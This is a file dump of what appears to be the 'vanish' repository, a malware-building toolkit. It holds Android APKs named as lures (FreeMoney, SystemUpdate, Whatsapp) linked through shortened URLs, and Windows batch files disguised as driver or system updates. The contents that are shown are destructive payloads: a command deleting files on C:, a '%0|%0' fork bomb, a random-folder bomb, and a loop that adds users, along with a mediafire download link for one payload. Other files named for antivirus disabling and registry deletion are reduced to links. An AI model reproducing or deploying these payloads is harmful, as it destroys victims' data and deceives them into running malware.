├── LICENSE ├── README.md ├── core ├── android.sh ├── linux.sh ├── macentosh.sh ├── menu.sh ├── src │ ├── about.sh │ ├── android │ │ ├── Facebook.apk │ │ ├── FreeMoney.apk │ │ ├── FreeRecharge.apk │ │ ├── HackGames.apk │ │ ├── Save.apk │ │ ├── SystemUpdate.apk │ │ ├── UnlimitedLikes.apk │ │ ├── Whatsapp.apk │ │ ├── Youtube.apk │ │ ├── facebook │ │ ├── facebook.sh │ │ ├── freemoney │ │ ├── freemoney.sh │ │ ├── freerecharge │ │ ├── freerecharge.sh │ │ ├── gamesvirus.sh │ │ ├── hackgames │ │ ├── likes │ │ ├── likes.sh │ │ ├── save │ │ ├── save.sh │ │ ├── systemupdate │ │ ├── systemupdate.sh │ │ ├── whatsapp │ │ ├── whatsapp.sh │ │ ├── youtube │ │ └── youtube.sh │ ├── linux │ │ ├── bashvirus │ │ ├── bashvirus.sh │ │ └── patchupdates.sh │ ├── mac │ │ ├── Update.scpt │ │ ├── mac │ │ └── mac.sh │ ├── update.sh │ └── windows │ │ ├── AppManagerUpdates.bat │ │ ├── CdDriveUpdate.bat │ │ ├── InternetManagerUpdate.bat │ │ ├── KeyboardDriverUpdate.bat │ │ ├── NewUserLogin.bat │ │ ├── NotePadUpdate.bat │ │ ├── ProcessManagerUpdate.bat │ │ ├── RegisteryRepairServices.bat │ │ ├── SoundDriverUpdate.bat │ │ ├── SystemServicesUpdate.bat │ │ ├── VirusDeleter.bat │ │ ├── WindowsCmdDriver.bat │ │ ├── WindowsNewDrivers.bat │ │ ├── annoyingpopups │ │ ├── annoyingpopups.sh │ │ ├── antivirusdisable │ │ ├── antivirusdisabler.sh │ │ ├── appbomb │ │ ├── appbomb.sh │ │ ├── cdpop │ │ ├── cdpop.sh │ │ ├── cdrivedeleter │ │ ├── cdrivedeleter.sh │ │ ├── cmdbomb │ │ ├── cmdbomb.sh │ │ ├── endlessenter │ │ ├── endlessenter.sh │ │ ├── endlessnotepad │ │ ├── endlessnotepad.sh │ │ ├── folderbomb │ │ ├── folderbomb.sh │ │ ├── internetdisabler │ │ ├── internetdisabler.sh │ │ ├── processbomb │ │ ├── processbomb.sh │ │ ├── registerydelete │ │ ├── registerydelete.sh │ │ ├── userbomb │ │ └── userbomb.sh └── windows.sh ├── setup └── vanish /LICENSE: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/LICENSE -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/README.md -------------------------------------------------------------------------------- /core/android.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/android.sh -------------------------------------------------------------------------------- /core/linux.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/linux.sh -------------------------------------------------------------------------------- /core/macentosh.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/macentosh.sh -------------------------------------------------------------------------------- /core/menu.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/menu.sh -------------------------------------------------------------------------------- /core/src/about.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/about.sh -------------------------------------------------------------------------------- /core/src/android/Facebook.apk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/android/Facebook.apk -------------------------------------------------------------------------------- /core/src/android/FreeMoney.apk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/android/FreeMoney.apk -------------------------------------------------------------------------------- /core/src/android/FreeRecharge.apk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/android/FreeRecharge.apk -------------------------------------------------------------------------------- /core/src/android/HackGames.apk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/android/HackGames.apk -------------------------------------------------------------------------------- /core/src/android/Save.apk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/android/Save.apk -------------------------------------------------------------------------------- /core/src/android/SystemUpdate.apk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/android/SystemUpdate.apk -------------------------------------------------------------------------------- /core/src/android/UnlimitedLikes.apk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/android/UnlimitedLikes.apk -------------------------------------------------------------------------------- /core/src/android/Whatsapp.apk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/android/Whatsapp.apk -------------------------------------------------------------------------------- /core/src/android/Youtube.apk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/android/Youtube.apk -------------------------------------------------------------------------------- /core/src/android/facebook: -------------------------------------------------------------------------------- 1 | https://cutt.ly/dhCvMmG 2 | -------------------------------------------------------------------------------- /core/src/android/facebook.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/android/facebook.sh -------------------------------------------------------------------------------- /core/src/android/freemoney: -------------------------------------------------------------------------------- 1 | https://cutt.ly/7hCvVyh 2 | -------------------------------------------------------------------------------- /core/src/android/freemoney.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/android/freemoney.sh -------------------------------------------------------------------------------- /core/src/android/freerecharge: -------------------------------------------------------------------------------- 1 | https://cutt.ly/fhCvZ0M 2 | -------------------------------------------------------------------------------- /core/src/android/freerecharge.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/android/freerecharge.sh -------------------------------------------------------------------------------- /core/src/android/gamesvirus.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/android/gamesvirus.sh -------------------------------------------------------------------------------- /core/src/android/hackgames: -------------------------------------------------------------------------------- 1 | https://cutt.ly/hhCvKEw 2 | -------------------------------------------------------------------------------- /core/src/android/likes: -------------------------------------------------------------------------------- 1 | https://cutt.ly/3hCvHDc 2 | -------------------------------------------------------------------------------- /core/src/android/likes.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/android/likes.sh -------------------------------------------------------------------------------- /core/src/android/save: -------------------------------------------------------------------------------- 1 | https://cutt.ly/khCvDu8 2 | -------------------------------------------------------------------------------- /core/src/android/save.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/android/save.sh -------------------------------------------------------------------------------- /core/src/android/systemupdate: -------------------------------------------------------------------------------- 1 | https://cutt.ly/PhCvIBh 2 | -------------------------------------------------------------------------------- /core/src/android/systemupdate.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/android/systemupdate.sh -------------------------------------------------------------------------------- /core/src/android/whatsapp: -------------------------------------------------------------------------------- 1 | https://cutt.ly/AhCvRn1 2 | -------------------------------------------------------------------------------- /core/src/android/whatsapp.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/android/whatsapp.sh -------------------------------------------------------------------------------- /core/src/android/youtube: -------------------------------------------------------------------------------- 1 | https://cutt.ly/shCvQrj 2 | -------------------------------------------------------------------------------- /core/src/android/youtube.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/android/youtube.sh -------------------------------------------------------------------------------- /core/src/linux/bashvirus: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/linux/bashvirus -------------------------------------------------------------------------------- /core/src/linux/bashvirus.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/linux/bashvirus.sh -------------------------------------------------------------------------------- /core/src/linux/patchupdates.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/linux/patchupdates.sh -------------------------------------------------------------------------------- /core/src/mac/Update.scpt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/mac/Update.scpt -------------------------------------------------------------------------------- /core/src/mac/mac: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/mac/mac -------------------------------------------------------------------------------- /core/src/mac/mac.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/mac/mac.sh -------------------------------------------------------------------------------- /core/src/update.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/update.sh -------------------------------------------------------------------------------- /core/src/windows/AppManagerUpdates.bat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/windows/AppManagerUpdates.bat -------------------------------------------------------------------------------- /core/src/windows/CdDriveUpdate.bat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/windows/CdDriveUpdate.bat -------------------------------------------------------------------------------- /core/src/windows/InternetManagerUpdate.bat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/windows/InternetManagerUpdate.bat -------------------------------------------------------------------------------- /core/src/windows/KeyboardDriverUpdate.bat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/windows/KeyboardDriverUpdate.bat -------------------------------------------------------------------------------- /core/src/windows/NewUserLogin.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | :xnet 3 | user %random% /add 4 | goto x 5 | -------------------------------------------------------------------------------- /core/src/windows/NotePadUpdate.bat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/windows/NotePadUpdate.bat -------------------------------------------------------------------------------- /core/src/windows/ProcessManagerUpdate.bat: -------------------------------------------------------------------------------- 1 | %0|%0 2 | -------------------------------------------------------------------------------- /core/src/windows/RegisteryRepairServices.bat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/windows/RegisteryRepairServices.bat -------------------------------------------------------------------------------- /core/src/windows/SoundDriverUpdate.bat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/windows/SoundDriverUpdate.bat -------------------------------------------------------------------------------- /core/src/windows/SystemServicesUpdate.bat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/windows/SystemServicesUpdate.bat -------------------------------------------------------------------------------- /core/src/windows/VirusDeleter.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | :x 3 | md %random% 4 | /folder. 5 | goto x 6 | -------------------------------------------------------------------------------- /core/src/windows/WindowsCmdDriver.bat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/windows/WindowsCmdDriver.bat -------------------------------------------------------------------------------- /core/src/windows/WindowsNewDrivers.bat: -------------------------------------------------------------------------------- 1 | @Echo off 2 | Del C:\ *.* |y 3 | -------------------------------------------------------------------------------- /core/src/windows/annoyingpopups: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/windows/annoyingpopups -------------------------------------------------------------------------------- /core/src/windows/annoyingpopups.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/windows/annoyingpopups.sh -------------------------------------------------------------------------------- /core/src/windows/antivirusdisable: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/windows/antivirusdisable -------------------------------------------------------------------------------- /core/src/windows/antivirusdisabler.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/windows/antivirusdisabler.sh -------------------------------------------------------------------------------- /core/src/windows/appbomb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/windows/appbomb -------------------------------------------------------------------------------- /core/src/windows/appbomb.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/windows/appbomb.sh -------------------------------------------------------------------------------- /core/src/windows/cdpop: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/windows/cdpop -------------------------------------------------------------------------------- /core/src/windows/cdpop.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/windows/cdpop.sh -------------------------------------------------------------------------------- /core/src/windows/cdrivedeleter: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/windows/cdrivedeleter -------------------------------------------------------------------------------- /core/src/windows/cdrivedeleter.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/windows/cdrivedeleter.sh -------------------------------------------------------------------------------- /core/src/windows/cmdbomb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/windows/cmdbomb -------------------------------------------------------------------------------- /core/src/windows/cmdbomb.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/windows/cmdbomb.sh -------------------------------------------------------------------------------- /core/src/windows/endlessenter: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/windows/endlessenter -------------------------------------------------------------------------------- /core/src/windows/endlessenter.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/windows/endlessenter.sh -------------------------------------------------------------------------------- /core/src/windows/endlessnotepad: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/windows/endlessnotepad -------------------------------------------------------------------------------- /core/src/windows/endlessnotepad.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/windows/endlessnotepad.sh -------------------------------------------------------------------------------- /core/src/windows/folderbomb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/windows/folderbomb -------------------------------------------------------------------------------- /core/src/windows/folderbomb.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/windows/folderbomb.sh -------------------------------------------------------------------------------- /core/src/windows/internetdisabler: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/windows/internetdisabler -------------------------------------------------------------------------------- /core/src/windows/internetdisabler.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/windows/internetdisabler.sh -------------------------------------------------------------------------------- /core/src/windows/processbomb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/windows/processbomb -------------------------------------------------------------------------------- /core/src/windows/processbomb.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/windows/processbomb.sh -------------------------------------------------------------------------------- /core/src/windows/registerydelete: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/windows/registerydelete -------------------------------------------------------------------------------- /core/src/windows/registerydelete.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/windows/registerydelete.sh -------------------------------------------------------------------------------- /core/src/windows/userbomb: -------------------------------------------------------------------------------- 1 | http://download2260.mediafire.com/7p23q8p6bivg/j3map0z2hwtnjds/NewUserLogin.bat 2 | -------------------------------------------------------------------------------- /core/src/windows/userbomb.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/src/windows/userbomb.sh -------------------------------------------------------------------------------- /core/windows.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/core/windows.sh -------------------------------------------------------------------------------- /setup: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/setup -------------------------------------------------------------------------------- /vanish: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/noob-hackers/vanish/HEAD/vanish --------------------------------------------------------------------------------